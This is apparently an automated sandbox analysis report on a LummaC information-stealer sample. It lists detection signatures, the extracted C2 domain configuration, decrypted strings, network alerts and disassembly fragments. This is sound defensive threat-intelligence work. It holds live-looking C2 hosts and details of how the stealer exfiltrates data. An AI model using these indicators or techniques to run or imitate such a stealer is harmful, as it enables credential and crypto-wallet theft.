Edit tour

Windows Analysis Report
9cOUjp7ybm.exe

Overview

General Information

Sample name:	9cOUjp7ybm.exe renamed because original name is a hash value
Original sample name:	1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95.exe
Analysis ID:	1584118
MD5:	7177b0ba961ddd258ee9672d436d6b63
SHA1:	cdb7aef7f7a05430d323c00d43fe98af4680fa28
SHA256:	1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95
Tags:	exeuser-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

9cOUjp7ybm.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\9cOUjp7ybm.exe" MD5: 7177B0BA961DDD258EE9672D436D6B63)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "undesirabkel.click", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--iicrrifofhfg"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7696	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7696	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7696	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:00.348017+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:01.447291+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:03.107818+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-04T09:42:06.751225+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-04T09:42:07.911389+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-04T09:42:09.758036+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-04T09:42:11.141919+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-04T09:42:13.787834+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:00.957953+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:02.320886+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:14.265404+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:00.957953+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:02.320886+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:00.348017+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:01.447291+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:03.107818+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-04T09:42:06.751225+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-04T09:42:07.911389+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-04T09:42:09.758036+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-04T09:42:11.141919+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-04T09:42:13.787834+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:41:59.845681+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.4	49481	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T09:42:07.275955+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://undesirabkel.click:443/apiK	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apirs	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click:443/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click:443/apiE	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiL7	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apia7p_=	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/d	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/a	Avira URL Cloud: Label: malware
Source: undesirabkel.click	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiam	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api:5	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiG5s_	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/#	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.9cOUjp7ybm.exe.6ce30000.6.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "undesirabkel.click", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--iicrrifofhfg"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: 9cOUjp7ybm.exe	ReversingLabs: Detection: 65%
Source: 9cOUjp7ybm.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9cOUjp7ybm.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: undesirabkel.click
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp	String decryptor: LPnhqo--iicrrifofhfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027A5270 CryptUnprotectData,

2_2_027A5270

Source: 9cOUjp7ybm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: 9cOUjp7ybm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, WEREB44.tmp.dmp.4.dr
Source:	Binary string: C:\Users\user\Desktop\9cOUjp7ybm.PDBD{ source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WEREB44.tmp.dmp.4.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbs source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WEREB44.tmp.dmp.4.dr
Source:	Binary string: \??\C:\Users\user\Desktop\9cOUjp7ybm.PDBr source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0040B810
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00405260
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00405260
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then mov ebx, eax	0_2_003F63C0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then mov ebp, eax	0_2_003F63C0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h	0_2_00431480
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00405D70
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_003F3670
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_003F7F20
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_003F7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027A5270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0000022Ah]	2_2_027A5270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp edx	2_2_027B2A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027B3288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0279CB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	2_2_027D0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_027CF950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0279A9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h	2_2_027D0980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7AAE27ECh]	2_2_027B24ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027A8C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], ebx	2_2_02799DEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]	2_2_02798A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	2_2_02799240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_027BBAC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp eax, BFFFFFFFh	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	2_2_02792B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_027B9B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	2_2_027C9B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+3Ch]	2_2_027ABBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]	2_2_027BC055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_027AB839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]	2_2_02799814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]	2_2_02799814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	2_2_027958C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, eax	2_2_027958C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_027BA0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_027B796F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]	2_2_027B5784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, ebx	2_2_027B8150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027B8150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_027A9980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	2_2_027B3E61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_027BC675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_027BC6D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]	2_2_027CF6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, ebx	2_2_027BB693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_027A4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_027A4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	2_2_027A4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-74590DBEh]	2_2_027A4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h]	2_2_027B6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_027B6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, ecx	2_2_027B6740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027B873A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]	2_2_02799710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]	2_2_02799710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, ecx	2_2_027A6711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_027C4FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, ecx	2_2_027A6FC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_027A7FB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]	2_2_027B5784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h	2_2_027C9460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h	2_2_027C9460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then test eax, eax	2_2_027C9460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_02797420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_02797420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	2_2_027ADC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	2_2_027D0CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027B8490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_027AAD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_027BA500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	2_2_027AE5F0
